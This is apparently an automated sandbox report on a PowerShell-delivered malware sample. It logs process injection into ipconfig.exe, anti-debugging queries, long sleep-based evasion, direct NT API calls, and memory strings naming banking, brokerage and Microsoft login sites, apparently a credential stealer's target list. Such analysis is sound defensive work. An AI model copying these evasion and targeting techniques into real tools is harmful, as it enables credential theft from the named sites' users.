Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0268774E push 6F9632E0h; ret	7_2_02687753
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02687795 push esp; iretd	7_2_02687796
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0269B5A3 push ebp; iretd	7_2_0269B5C3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0269DA0D push esi; ret	7_2_0269DA1B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0269DA10 push esi; ret	7_2_0269DA1B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02694D0B push esp; retf	7_2_02694D0C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CC5222 push eax; ret	7_2_02CC5224
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB53BE push ED351FDDh; iretd	7_2_02CB53C4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CBF10B push ss; retf	7_2_02CBF116
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB658C push ebx; ret	7_2_02CB6596
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB5B46 push ecx; ret	7_2_02CB5B47
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB283F pushfd ; retf	7_2_02CB2844

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B762D324
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B762D944
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B762D504
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B762D544
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B762D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B7630154
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FF9B762DA44

Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 4660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 4D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 5D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 5E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 6E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 71E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 81E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory allocated: 91E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4807	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1307	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 9773	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\ipconfig.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe TID: 4200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5172	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6400	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4548	Thread sleep count: 200 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4548	Thread sleep time: -400000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4548	Thread sleep count: 9773 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4548	Thread sleep time: -19546000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe TID: 6780	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe TID: 6780	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe TID: 6780	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe TID: 6780	Thread sleep time: -32000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3288120584.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: 752-93p5q.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 752-93p5q.7.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 752-93p5q.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 752-93p5q.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 752-93p5q.7.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 00000005.00000002.2815943353.000002AF5F455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2815095873.000002AF5A02B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2815895927.000002AF5F443000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 752-93p5q.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 752-93p5q.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 752-93p5q.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 752-93p5q.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: firefox.exe, 0000000F.00000002.1617578196.000001D4AFC1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 752-93p5q.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 752-93p5q.7.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 752-93p5q.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 752-93p5q.7.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: powershell.exe, 00000000.00000002.862471082.000000000516B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JECEVmCISiWhQf
Source: 752-93p5q.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 752-93p5q.7.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 752-93p5q.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: ipconfig.exe, 00000007.00000002.3287297366.00000000028CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: 752-93p5q.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 752-93p5q.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 752-93p5q.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 752-93p5q.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Source: Yara match	File source: done1.ps1, type: SAMPLE
Source: Yara match	File source: amsi32_7068.amsi.csv, type: OTHER

Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtSetInformationThread: Direct from: 0x77D62B4C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtReadVirtualMemory: Direct from: 0x77D62E8C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtCreateKey: Direct from: 0x77D62C6C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtQueryAttributesFile: Direct from: 0x77D62E6C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtQuerySystemInformation: Direct from: 0x77D648CC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtQueryVolumeInformationFile: Direct from: 0x77D62F2C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtAllocateVirtualMemory: Direct from: 0x77D648EC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtOpenSection: Direct from: 0x77D62E0C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtDeviceIoControlFile: Direct from: 0x77D62AEC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtQuerySystemInformation: Direct from: 0x77D62DFC	Jump to behavior
